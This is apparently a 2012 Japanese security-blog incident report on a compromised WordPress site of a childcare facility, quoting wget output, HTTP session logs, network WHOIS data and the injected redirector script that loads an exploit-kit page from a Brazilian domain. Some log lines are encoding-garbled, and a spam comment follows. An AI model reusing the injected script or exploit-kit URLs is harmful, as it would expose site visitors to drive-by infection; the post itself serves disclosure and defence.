水曜日, 9月 26, 2012

#OCJP-068: 「smilekidsroom.com./210.134.55.213」の感染事件、Kagoya Japan/KIRネットワークにあるウェブサーバにWP脆弱性があり、マルウェア転送コードを発見されました

下記のURLとダウンロード証拠↓
--19:36:30--  hxxp: // smilekidsroom.com/wp/
           => `index.html'
Resolving smilekidsroom.com... 210.134.55.213
Connecting to smilekidsroom.com|210.134.55.213|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
19:36:31 (361.00 KB/s) - `index.html' saved [28436]
マルウェア感染コードを発見しました。WPの脆弱性経由でインジェクトされたそうです。
index.htmlのライン521にインジェクトされたマルウェアのredirectorコードを発見↓
<a href="hxxp: // smilekidsroom.com/wp/?m=20120913" 
title="当園のご見学について<script type="text/javascript" 
src="hxxp: // asaunirg.com.br/js/0day.php"></script>">
ブラウザーで実行したら下記のURLにユーザが飛ばされます↓
hxxp: // asaunirg.com.br//js/0day.php?action=jv&h=4571 
↑exploit kit 感染URL(landing page)
HTTPのセッションログ↓
[HTTP] URL: hxxp: // smilekidsroom.com/wp/ (Status: 200, Referrer: None)
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<meta content="text/javascript" http-equiv="Content-Script-Type"/>
<meta content="text/css" http-equiv="content-style-type"/>
<meta content="Copyright (C) SMILE KIDS ROOM All Rights Reserved." name="copyright"/>
<meta content="SMILE KIDS ROOM" name="Author"/>
[HTTP] URL: hxxp: // smilekidsroom.com/wp/wp-content/themes/smilekidsroom/js/jquery.js (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
[HTTP] URL: hxxp: // smilekidsroom.com/wp/wp-content/themes/smilekidsroom/js/jquery.cookie.js (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
[HTTP] URL: hxxp: // smilekidsroom.com/wp/wp-content/themes/smilekidsroom/js/pagetop.js (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
[HTTP] URL: hxxp: // smilekidsroom.com/wp/wp-con‰åŠ å¸‚,24時間,駅,ã時間駅型俒å…éšæ™‚募集中ï¼SMILE KIDS ROOM" name="Description"/>om/wp/)
<meta content="ä¿’,託å…所,埼玉,埼玉県,è¯åŸ¼çŽ‰çœŒè           
[HTTP] URL: hxxp: // asaunirg.com.br/js/0day.php (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/
[HTTP] URL: hxxp: // asaunirg.com.br//js/0day.php?action=jv&h=4571 (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
[HTTP] URL: hxxp: // asaunirg.com.br//js/0day.php?action=jv&h=4571 (Status: 200, Referrer: hxxp: // smilekidsroom.com/wp/)
Saving log analysis at ../logs/01cd69508c7a060db5f95e2ecbc550d8/20120926193920
[HTTP] URL: hxxp: // asaunirg.com.br//js/0day.php?action=jv&h=4571
           => `0day.php@action=jv&h=4571.2'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200 OK
ネットワーク責任者の情報↓
inetnum:        210.134.54.0 - 210.134.55.255
netname:        KIR
descr:          Kagoya Japan Corporation
country:        JP
admin-c:        SK1294JP
tech-c:         TS13540JP
※ ドメイン責任者の情報はインターネットで調べられます。

1 件のコメント:

  1. Thanks for your grateful informations, this blogs will be really help for PHP tutorial.

    返信削除